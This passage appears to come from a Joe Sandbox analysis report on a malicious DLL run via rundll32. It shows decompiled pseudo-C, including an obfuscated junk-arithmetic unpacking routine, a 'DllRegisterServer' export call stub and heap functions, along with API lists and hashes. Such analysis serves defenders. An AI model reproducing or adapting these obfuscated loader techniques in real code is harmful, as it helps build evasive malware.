                                                                        														 *((intOrPtr*)(_t453 + 0x34)) = (2 - _t759 + _t759) *  *0x1004b0e0 +  *((intOrPtr*)(_t1251 + 0x30)) + (_t759 * 0x7ffffffd + ((_t759 *  *0x1004b0ec + _t895 + 1) * 0x7fffffff + _t1184 *  *0x1004b0d8 *  *0x1004b0dc) * _t895 + _t1187) * 2;
                                                                        														_t900 =  *0x1004b0e8; // 0x0
                                                                        														_t454 =  *0x1004b0e4; // 0x0
                                                                        														_t761 =  *0x1004b0ec; // 0x0
                                                                        														_t624 =  *0x1004b0d8; // 0x0
                                                                        														_t293 = _t624 + 1; // 0x1
                                                                        														_t463 =  *0x1004b0e0; // 0x0
                                                                        														_push((0xc0 - (_t454 * _t900 * _t761 + _t454 * _t900 * _t761 * 2 << 6)) * _t900 - (_t293 * _t761 + _t293 * _t761 * 2 << 6) + _t1066);
                                                                        														_push(_t951);
                                                                        														_push((0xfffffffc -  *0x1004b0e4) *  *0x1004b0dc - (_t463 + 1) * _t900 * _t761 - _t761 * _t624 - _t900 +  *((intOrPtr*)(_t1251 + 0x88)));
                                                                        														_push( *((intOrPtr*)(_t1251 + 0x84)));
                                                                        														_t467 = E10002CA0();
                                                                        														_t1251 = _t1251 + 0x30;
                                                                        														if(_t467 == 0) {
                                                                        															goto L31;
                                                                        														} else {
                                                                        															_t468 =  *0x1004b0e8; // 0x0
                                                                        															_t765 =  *0x1004b0d8; // 0x0
                                                                        															_t1200 =  *0x1004b0dc; // 0x0
                                                                        															_t903 =  *0x1004b0e4; // 0x0
                                                                        															_t905 =  *0x1004b0ec; // 0x0
                                                                        															_t1202 = _t765 - _t905 + _t905;
                                                                        															_t907 =  *0x1004b0dc; // 0x0
                                                                        															_t299 = _t1202 - 2; // -2
                                                                        															_t636 = (_t765 + _t299) * _t907 + (((_t468 * _t765 - _t1200) * _t765 - 2) *  *0x1004b0e0 + _t468 * _t468 - _t903 + _t903 - _t905) * 2 +  *((intOrPtr*)( *_t1066 + 0x34)) -  *((intOrPtr*)(_t951 + 0x34));
                                                                        															 *((intOrPtr*)(_t1251 + 0x60)) = _t636;
                                                                        															if(_t636 == 0) {
                                                                        																 *((intOrPtr*)(_t1066 + 0x18)) = 1;
                                                                        															} else {
                                                                        																_t963 =  *0x1004b0e0; // 0x0
                                                                        																_t1227 =  *0x1004b0e4; // 0x0
                                                                        																_push( *((intOrPtr*)(_t1251 + 0x60)) + ((_t963 - _t1227 +  *0x1004b0ec << 1) - (_t468 *  *0x1004b0ec * _t907 * _t907 * _t907 + _t963 * _t468) * _t468 + _t907) * 4);
                                                                        																_t970 =  *0x1004b0e0; // 0x0
                                                                        																_t971 =  *0x1004b0e4; // 0x0
                                                                        																_push((((_t970 * _t970 << 1) - _t971 + _t468 + _t468 - 2) * _t907 - (_t907 + 4 + _t765 * 2) * _t971 + (_t765 - _t468 + _t468) * 2 << 6) + _t1066);
                                                                        																_t492 = E10003B80();
                                                                        																_t924 =  *0x1004b0e0; // 0x0
                                                                        																_t1251 = _t1251 + 8;
                                                                        																 *((intOrPtr*)(_t1066 + 0x18)) = _t492 - (_t924 *  *0x1004b0d8 << 2);
                                                                        															}
                                                                        															_t469 =  *0x1004b0e4; // 0x0
                                                                        															_t766 =  *0x1004b0e0; // 0x0
                                                                        															_push((_t766 - _t469 *  *0x1004b0e8 *  *0x1004b0ec *  *0x1004b0dc << 8) + _t1066);
                                                                        															_t473 = E10003F40();
                                                                        															_t1251 = _t1251 + 4;
                                                                        															if(_t473 == 0) {
                                                                        																goto L31;
                                                                        															} else {
                                                                        																_t474 =  *0x1004b0e8; // 0x0
                                                                        																_t770 =  *0x1004b0dc; // 0x0
                                                                        																_t637 =  *0x1004b0e4; // 0x0
                                                                        																_t318 = _t474 * 2; // 0x1
                                                                        																_t954 =  *0x1004b0ec; // 0x0
                                                                        																_push(((1 - _t474 - _t770) *  *0x1004b0d8 + (_t770 + _t318 + 1) *  *0x1004b0e0 + _t770 * 2 - _t637 - _t954 + _t474 << 8) + _t1066);
                                                                        																_t475 = E10003570();
                                                                        																_t1251 = _t1251 + 4;
                                                                        																if(_t475 == 0) {
                                                                        																	goto L31;
                                                                        																} else {
                                                                        																	_t913 =  *0x1004b0e0; // 0x0
                                                                        																	_push((_t913 *  *0x1004b0d8 *  *0x1004b0dc << 7) + _t1066);
                                                                        																	_t476 = E10003AD0();
                                                                        																	_t1251 = _t1251 + 4;
                                                                        																	if(_t476 != 0) {
                                                                        																		_t478 =  *((intOrPtr*)( *_t1066 + 0x28));
                                                                        																		 *((intOrPtr*)(_t1251 + 0x60)) = _t478;
                                                                        																		if(_t478 == 0) {
                                                                        																			 *(_t1066 + 0x38) = 0;
                                                                        																			return _t1066;
                                                                        																		} else {
                                                                        																			if( *(_t1066 + 0x14) == 0) {
                                                                        																				_t481 =  *0x1004b0d8; // 0x0
                                                                        																				_t955 =  *0x1004b0e0; // 0x0
                                                                        																				_t918 =  *0x1004b0ec; // 0x0
                                                                        																				_t778 =  *0x1004b0e8; // 0x0
                                                                        																				_t331 = _t955 * _t778 - _t918 + 1; // 0x1
                                                                        																				 *(_t1066 + 0x38) = (_t778 * _t778 * _t481 * 4 - 4) * _t955 + (4 - _t481 * 4) * _t918 +  *((intOrPtr*)(_t1251 + 0x60)) + (_t481 + _t331) *  *0x1004b0dc * 4 +  *((intOrPtr*)(_t1251 + 0x10));
                                                                        																				return _t1066;
                                                                        																			} else {
                                                                        																				_t780 =  *0x1004b0ec; // 0x0
                                                                        																				_t921 =  *0x1004b0d8; // 0x0
                                                                        																				_t956 =  *0x1004b0e4; // 0x0
                                                                        																				_t642 =  *0x1004b0dc; // 0x0
                                                                        																				_t962 =  *0x1004b0e0; // 0x0
                                                                        																				 *0x1004d404 = (_t780 * _t921 - (_t956 + _t642) * _t956 - 3) *  *0x1004b0e8 - _t921 * _t642 + _t962 * _t962 - _t780 - _t780 +  *((intOrPtr*)(_t1251 + 0x60)) + _t780 * _t921 + _t921 +  *((intOrPtr*)(_t1251 + 0x10));
                                                                        																				 *((intOrPtr*)(_t1066 + 0x10)) = 1;
                                                                        																				return _t1066;
                                                                        																			}
                                                                        																		}
                                                                        																	} else {
                                                                        																		goto L31;
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													_t1067 =  *0x1004b0d8; // 0x0
                                                                        													_t928 =  *0x1004b0dc; // 0x0
                                                                        													_t219 = ((_t1067 * _t928 - 1) * _t731 - 1) *  *0x1004b0e4 + _t412 + 0x8000; // 0x7fff
                                                                        													 *((intOrPtr*)(_t1250 + 0x78))(_t585, 0, (_t412 * _t928 - 1) *  *0x1004b0e0 + _t219,  *((intOrPtr*)(_t1250 + 0x78)));
                                                                        													return 0;
                                                                        												}
                                                                        											} else {
                                                                        												_t789 =  *0x1004b0e4; // 0x0
                                                                        												_t930 =  *0x1004b0dc; // 0x0
                                                                        												_t1075 =  *0x1004b0d8; // 0x0
                                                                        												_t1076 =  *0x1004b0ec; // 0x0
                                                                        												_t194 = _t1076 - 4; // -4
                                                                        												_t665 =  *0x1004b0e8; // 0x0
                                                                        												_t498 =  *0x1004b0e0; // 0x0
                                                                        												_t1084 =  *0x1004b0d8; // 0x0
                                                                        												_t198 = (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084) * 2; // -3
                                                                        												_t200 = _t1084 + 2; // 0x2
                                                                        												_t1085 =  *0x1004b0ec; // 0x0
                                                                        												_t668 =  *0x1004b0d8; // 0x0
                                                                        												_t207 = (1 - _t668) * _t789 + _t1085 + _t930 + 0x1000; // 0x1001
                                                                        												_t520 =  *0x1004b0e0; // 0x0
                                                                        												_t1168 =  *((intOrPtr*)(_t1250 + 0x70));
                                                                        												_t523 =  *_t1168(0,  *((intOrPtr*)(_t1250 + 0x20)) + _t520 *  *0x1004b0e8 * 2, (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084 + _t198 - 0x00000003) * _t789 - _t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002 + (_t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002) * 0x00000002 + 0x00002000 | (0x00000001 - _t668) * _t789 + _t1085 + _t930 + _t207, (1 - _t930) * _t665 + (1 - _t789 * _t930) * _t789 + _t498 + (_t1075 * _t1075 - _t789 * _t930 + _t194) * _t1076 + 4,  *((intOrPtr*)(_t1250 + 0x78)));
                                                                        												_t1250 = _t1250 + 0x14;
                                                                        												 *((intOrPtr*)(_t1250 + 0x10)) = _t523;
                                                                        												if(_t523 == 0) {
                                                                        													goto L32;
                                                                        												} else {
                                                                        													_t585 = _t523;
                                                                        													goto L21;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}
                                                                        0x10005686
                                                                        0x10005693
                                                                        0x10005693
                                                                        0x100056a3
                                                                        0x100056ac
                                                                        0x100056b0
                                                                        0x100056b0
                                                                        0x100056b0
                                                                        0x100056ba
                                                                        0x100056cf
                                                                        0x100056fb
                                                                        0x10005701
                                                                        0x10005706
                                                                        0x1000570c
                                                                        0x10005712
                                                                        0x10005724
                                                                        0x10005753
                                                                        0x10005757
                                                                        0x1000575c
                                                                        0x10005765
                                                                        0x10005770
                                                                        0x10005783
                                                                        0x10005788
                                                                        0x10005797
                                                                        0x1000579d
                                                                        0x100057a1
                                                                        0x100057b3
                                                                        0x100057cf
                                                                        0x100057d5
                                                                        0x100057dd
                                                                        0x100057f5
                                                                        0x100057fe
                                                                        0x10005803
                                                                        0x00000000
                                                                        0x10005809
                                                                        0x10005809
                                                                        0x10005814
                                                                        0x10005827
                                                                        0x1000582e
                                                                        0x10005845
                                                                        0x1000584d
                                                                        0x1000585d
                                                                        0x10005894
                                                                        0x100058c0
                                                                        0x100058c7
                                                                        0x100058cd
                                                                        0x100058e6
                                                                        0x10005907
                                                                        0x10005909
                                                                        0x1000590c
                                                                        0x10005910
                                                                        0x10005914
                                                                        0x10005a04
                                                                        0x10005a04
                                                                        0x10005a0a
                                                                        0x10005a34
                                                                        0x10005a38
                                                                        0x10005a3e
                                                                        0x10005a4f
                                                                        0x10005a72
                                                                        0x10005a78
                                                                        0x10005a80
                                                                        0x10005a89
                                                                        0x10005a99
                                                                        0x10005a9b
                                                                        0x10005ae8
                                                                        0x10005aeb
                                                                        0x10005af0
                                                                        0x10005afc
                                                                        0x10005b03
                                                                        0x10005b09
                                                                        0x10005b23
                                                                        0x10005b2c
                                                                        0x10005b2e
                                                                        0x10005b33
                                                                        0x10005b3a
                                                                        0x10005b41
                                                                        0x10005b44
                                                                        0x10005b47
                                                                        0x10005b4a
                                                                        0x10005b52
                                                                        0x10005b7d
                                                                        0x10005b80
                                                                        0x10005b86
                                                                        0x10005b8b
                                                                        0x10005b94
                                                                        0x10005b9f
                                                                        0x10005ba7
                                                                        0x10005bb8
                                                                        0x10005bd3
                                                                        0x10005bd8
                                                                        0x10005bdd
                                                                        0x10006008
                                                                        0x10006008
                                                                        0x10006009
                                                                        0x00000000
                                                                        0x10005be3
                                                                        0x10005be3
                                                                        0x10005bf5
                                                                        0x10005c07
                                                                        0x10005c27
                                                                        0x10005c47
                                                                        0x10005c4f
                                                                        0x10005c75
                                                                        0x10005c79
                                                                        0x10005c7f
                                                                        0x10005c85
                                                                        0x10005c90
                                                                        0x10005c94
                                                                        0x10005cbf
                                                                        0x10005ccf
                                                                        0x10005cec
                                                                        0x10005cf2
                                                                        0x10005cf8
                                                                        0x10005d08
                                                                        0x10005d13
                                                                        0x10005d23
                                                                        0x10005d36
                                                                        0x10005d70
                                                                        0x10005d72
                                                                        0x10005d74
                                                                        0x10005d7a
                                                                        0x10005d8e
                                                                        0x10005da9
                                                                        0x10005dd5
                                                                        0x10005dd8
                                                                        0x10005dde
                                                                        0x10005de3
                                                                        0x10005dec
                                                                        0x10005e05
                                                                        0x10005e13
                                                                        0x10005e1e
                                                                        0x10005e30
                                                                        0x10005e4e
                                                                        0x10005e4f
                                                                        0x10005e50
                                                                        0x10005e55
                                                                        0x10005e5a
                                                                        0x00000000
                                                                        0x10005e60
                                                                        0x10005e60
                                                                        0x10005e65
                                                                        0x10005e6b
                                                                        0x10005e8c
                                                                        0x10005e96
                                                                        0x10005ea2
                                                                        0x10005ea4
                                                                        0x10005eaa
                                                                        0x10005eba
                                                                        0x10005ebd
                                                                        0x10005ec1
                                                                        0x10005f58
                                                                        0x10005ec7
                                                                        0x10005ec7
                                                                        0x10005ee6
                                                                        0x10005f04
                                                                        0x10005f05
                                                                        0x10005f10
                                                                        0x10005f38
                                                                        0x10005f39
                                                                        0x10005f3e
                                                                        0x10005f4e
                                                                        0x10005f53
                                                                        0x10005f53
                                                                        0x10005f5f
                                                                        0x10005f79
                                                                        0x10005f86
                                                                        0x10005f87
                                                                        0x10005f8c
                                                                        0x10005f91
                                                                        0x00000000
                                                                        0x10005f93
                                                                        0x10005f93
                                                                        0x10005f98
                                                                        0x10005f9e
                                                                        0x10005fa4
                                                                        0x10005fc1
                                                                        0x10005fd5
                                                                        0x10005fd6
                                                                        0x10005fdb
                                                                        0x10005fe0
                                                                        0x00000000
                                                                        0x10005fe2
                                                                        0x10005fe2
                                                                        0x10005ffb
                                                                        0x10005ffc
                                                                        0x10006001
                                                                        0x10006006
                                                                        0x1000601d
                                                                        0x10006022
                                                                        0x10006026
                                                                        0x1000610e
                                                                        0x1000611d
                                                                        0x1000602c
                                                                        0x10006031
                                                                        0x100060a5
                                                                        0x100060aa
                                                                        0x100060b0
                                                                        0x100060c4
                                                                        0x100060d4
                                                                        0x10006101
                                                                        0x1000610c
                                                                        0x10006033
                                                                        0x10006033
                                                                        0x10006039
                                                                        0x1000603f
                                                                        0x10006045
                                                                        0x1000606d
                                                                        0x1000608f
                                                                        0x10006095
                                                                        0x100060a4
                                                                        0x100060a4
                                                                        0x10006031
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10006006
                                                                        0x10005fe0
                                                                        0x10005f91
                                                                        0x10005e5a
                                                                        0x10005a9d
                                                                        0x10005aa1
                                                                        0x10005aa8
                                                                        0x10005acc
                                                                        0x10005ad7
                                                                        0x10005ae7
                                                                        0x10005ae7
                                                                        0x1000591a
                                                                        0x1000591a
                                                                        0x10005920
                                                                        0x1000592b
                                                                        0x10005936
                                                                        0x10005943
                                                                        0x10005947
                                                                        0x10005957
                                                                        0x10005981
                                                                        0x10005989
                                                                        0x1000598d
                                                                        0x100059a0
                                                                        0x100059ae
                                                                        0x100059cb
                                                                        0x100059d2
                                                                        0x100059e7
                                                                        0x100059f1
                                                                        0x100059f3
                                                                        0x100059f8
                                                                        0x100059fc
                                                                        0x00000000
                                                                        0x10005a02
                                                                        0x10005a02
                                                                        0x00000000
                                                                        0x10005a02
                                                                        0x100059fc
                                                                        0x10005914
                                                                        0x10005803
                                                                        0x10005505
                                                                        0x100054cb
                                                                        0x10005488
                                                                        0x10005409
                                                                        0x10005361

                                                                        APIs
                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 100056FB
                                                                        • GetProcessHeap.KERNEL32(00000000,00000041), ref: 10005A6B
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 10005A72
                                                                        • memcpy.MSVCRT ref: 10005CEC
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocInfoNativeProcessSystemmemcpy
                                                                        • String ID:
                                                                        • API String ID: 1755227880-0
                                                                        • Opcode ID: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
                                                                        • Instruction ID: 53ea61cdfd61ec98e79d57da9c3d37a8995a084b4a0616e836109eb4d92bec45
                                                                        • Opcode Fuzzy Hash: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
                                                                        • Instruction Fuzzy Hash: 5A92D7326407298FD318DF6CCEC2546B7A9F789311B05863AD925DB3B5E670F909CB88
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 93%
                                                                        			E100350EA(intOrPtr __ecx, void* __eflags) {
                                                                        				void* _t37;
                                                                        				intOrPtr _t54;
                                                                        				void* _t56;
                                                                        
                                                                        				E10011BF0(0x1003a421, _t56);
                                                                        				_push(__ecx);
                                                                        				_t54 = __ecx;
                                                                        				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
                                                                        				E10035766(__ecx, __eflags); // executed
                                                                        				 *((intOrPtr*)(_t56 - 4)) = 0;
                                                                        				 *((intOrPtr*)(__ecx)) = 0x1003d6fc;
                                                                        				if( *((intOrPtr*)(_t56 + 8)) == 0) {
                                                                        					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
                                                                        				} else {
                                                                        					 *((intOrPtr*)(_t54 + 0x4c)) = E10011F76( *((intOrPtr*)(_t56 + 8)));
                                                                        				}
                                                                        				_t37 = E100373B5();
                                                                        				_t44 = _t37;
                                                                        				_push(0x10035062);
                                                                        				_t7 = _t44 + 0x1070; // 0x1070
                                                                        				 *((intOrPtr*)(E10037855(_t7) + 4)) = _t54;
                                                                        				 *((intOrPtr*)(_t54 + 0x28)) = GetCurrentThread();
                                                                        				 *((intOrPtr*)(_t54 + 0x2c)) = GetCurrentThreadId();
                                                                        				 *((intOrPtr*)(_t37 + 4)) = _t54;
                                                                        				 *((intOrPtr*)(_t54 + 0x40)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x78)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x60)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x64)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x50)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x5c)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x84)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x54)) = 0;
                                                                        				 *((short*)(_t54 + 0x8e)) = 0;
                                                                        				 *((short*)(_t54 + 0x8c)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x44)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x88)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x7c)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x80)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x6c)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x70)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x90)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x98)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x58)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x68)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x94)) = 0x200;
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
                                                                        				return _t54;
                                                                        			}







                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 100350EF
                                                                          • Part of subcall function 10035766: __EH_prolog.LIBCMT ref: 1003576B
                                                                        • GetCurrentThread.KERNEL32 ref: 1003513D
                                                                        • GetCurrentThreadId.KERNEL32 ref: 10035146
                                                                          • Part of subcall function 10011F76: _strlen.LIBCMT ref: 10011F80
                                                                          • Part of subcall function 10011F76: _strcat.LIBCMT ref: 10011F94
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentH_prologThread$_strcat_strlen
                                                                        • String ID:
                                                                        • API String ID: 268772951-0
                                                                        • Opcode ID: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
                                                                        • Instruction ID: 61552a51ecdf068f7bb4f9f9d17d647312d48b00674ee0c1313581d8a4369c28
                                                                        • Opcode Fuzzy Hash: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
                                                                        • Instruction Fuzzy Hash: 44218CB0800B509FD321CF6AD44569AFBF8FFA4641F10891FE5AA8BB21CBB5A541CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 226 10005090-10005097 227 100050a0-100050ab call 10004780 226->227 228 10005099-1000509a ExitProcess 226->228 231 100050b0-100050b2 227->231
                                                                        C-Code - Quality: 64%
                                                                        			E10005090() {
                                                                        				int _t1;
                                                                        
                                                                        				_t1 =  *0x1004d408; // 0x315fcf0
                                                                        				if(_t1 == 0) {
                                                                        					ExitProcess(_t1);
                                                                        				}
                                                                        				_push("DllRegisterServer");
                                                                        				_push(_t1);
                                                                        				 *((intOrPtr*)(E10004780()))(); // executed
                                                                        				return 0;
                                                                        			}





                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID: DllRegisterServer
                                                                        • API String ID: 621844428-1663957109
                                                                        • Opcode ID: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
                                                                        • Instruction ID: 3990abb4a36e91ec48151b626d133cf46f0332b691c0db4f0bfff747b4acf562
                                                                        • Opcode Fuzzy Hash: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
                                                                        • Instruction Fuzzy Hash: 5BC08CB1A002191BE601EBF29C8CE0B329C8B801877020414F100D2005EF30E10002A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 232 1001382a-10013842 call 10012514 235 10013845-1001384d 232->235 236 10013844 232->236 237 100138b4-100138b6 235->237 238 1001384f-10013856 235->238 236->235 239 100138b8-100138be 237->239 240 100138dd 237->240 241 10013858-1001386a 238->241 242 1001389f-100138a1 238->242 239->240 245 100138c0-100138c9 call 10014676 239->245 243 100138df-100138e4 call 1001254f 240->243 241->242 246 1001386c-1001388f call 10013a38 call 1001437a call 100138d4 241->246 242->240 244 100138a3-100138b2 RtlAllocateHeap 242->244 244->237 245->235 254 100138cf 245->254 246->244 258 10013891-1001389c call 10011c50 246->258 254->243 258->242
                                                                        C-Code - Quality: 76%
                                                                        			E1001382A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				void* _t17;
                                                                        				long _t23;
                                                                        				long _t31;
                                                                        				void* _t33;
                                                                        				void* _t34;
                                                                        				void* _t40;
                                                                        
                                                                        				_push(0x10);
                                                                        				_push(0x10041e40);
                                                                        				E10012514(__ebx, __edi, __esi);
                                                                        				_t31 =  *(_t33 + 8) *  *(_t33 + 0xc);
                                                                        				 *(_t33 - 0x20) = _t31;
                                                                        				if(_t31 == 0) {
                                                                        					_t31 = _t31 + 1;
                                                                        				}
                                                                        				do {
                                                                        					_t28 = 0;
                                                                        					 *(_t33 - 0x1c) = 0;
                                                                        					if(_t31 > 0xffffffe0) {
                                                                        						L9:
                                                                        						if(_t28 != 0 ||  *0x1004f58c == _t28) {
                                                                        							L13:
                                                                        							_t15 = _t28;
                                                                        							L14:
                                                                        							return E1001254F(_t15);
                                                                        						} else {
                                                                        							goto L11;
                                                                        						}
                                                                        					}
                                                                        					if( *0x10050a64 != 3) {
                                                                        						L7:
                                                                        						if(_t28 != 0) {
                                                                        							goto L13;
                                                                        						}
                                                                        						L8:
                                                                        						_t17 = RtlAllocateHeap( *0x10050a60, 8, _t31); // executed
                                                                        						_t28 = _t17;
                                                                        						goto L9;
                                                                        					}
                                                                        					_t31 = _t31 + 0x0000000f & 0xfffffff0;
                                                                        					 *(_t33 + 0xc) = _t31;
                                                                        					_t23 =  *(_t33 - 0x20);
                                                                        					_t40 = _t23 -  *0x10050a50; // 0x0
                                                                        					if(_t40 > 0) {
                                                                        						goto L7;
                                                                        					}
                                                                        					E10013A38(_t23, 0, 4);
                                                                        					 *(_t33 - 4) =  *(_t33 - 4) & 0;
                                                                        					_push(_t23);
                                                                        					 *(_t33 - 0x1c) = E1001437A();
                                                                        					 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
                                                                        					E100138D4();
                                                                        					_t28 =  *(_t33 - 0x1c);
                                                                        					if(_t28 == 0) {
                                                                        						goto L8;
                                                                        					}
                                                                        					E10011C50(_t28, 0,  *(_t33 - 0x20));
                                                                        					_t34 = _t34 + 0xc;
                                                                        					goto L7;
                                                                        					L11:
                                                                        				} while (E10014676(_t31) != 0);
                                                                        				goto L14;
                                                                        			}










                                                                        APIs
                                                                        • __lock.LIBCMT ref: 1001386E
                                                                        • RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap__lock
                                                                        • String ID:
                                                                        • API String ID: 4078605025-0
                                                                        • Opcode ID: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
                                                                        • Instruction ID: 7e3eb1e6f8f5fb1ab58181eb2bcb74cf9bd6752373f8cd469f9ee3675e8c65d6
                                                                        • Opcode Fuzzy Hash: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
                                                                        • Instruction Fuzzy Hash: D711EF36D0076A9ADB01DBA48C41B9DB771FF807A0F12811AFC646F2E1DF34D9808B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 261 100107c8-100107d9 call 10012514 264 10010833-10010838 call 1001254f 261->264 265 100107db-100107e2 261->265 267 10010824 265->267 268 100107e4-100107fc call 10013a38 call 10013b9b 265->268 269 10010825-1001082d RtlFreeHeap 267->269 275 10010807-10010814 call 1001081b 268->275 276 100107fe-10010806 call 10013bc6 268->276 269->264 275->264 281 10010816-10010819 275->281 276->275 281->269
                                                                        C-Code - Quality: 18%
                                                                        			E100107C8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				char _t9;
                                                                        				intOrPtr _t12;
                                                                        				intOrPtr _t21;
                                                                        				void* _t22;
                                                                        
                                                                        				_push(0xc);
                                                                        				_push(0x10041d10);
                                                                        				_t9 = E10012514(__ebx, __edi, __esi);
                                                                        				_t21 =  *((intOrPtr*)(_t22 + 8));
                                                                        				if(_t21 != 0) {
                                                                        					if( *0x10050a64 != 3) {
                                                                        						_push(_t21);
                                                                        						goto L7;
                                                                        					} else {
                                                                        						E10013A38(__ebx, __edi, 4);
                                                                        						 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
                                                                        						_t12 = E10013B9B(_t21);
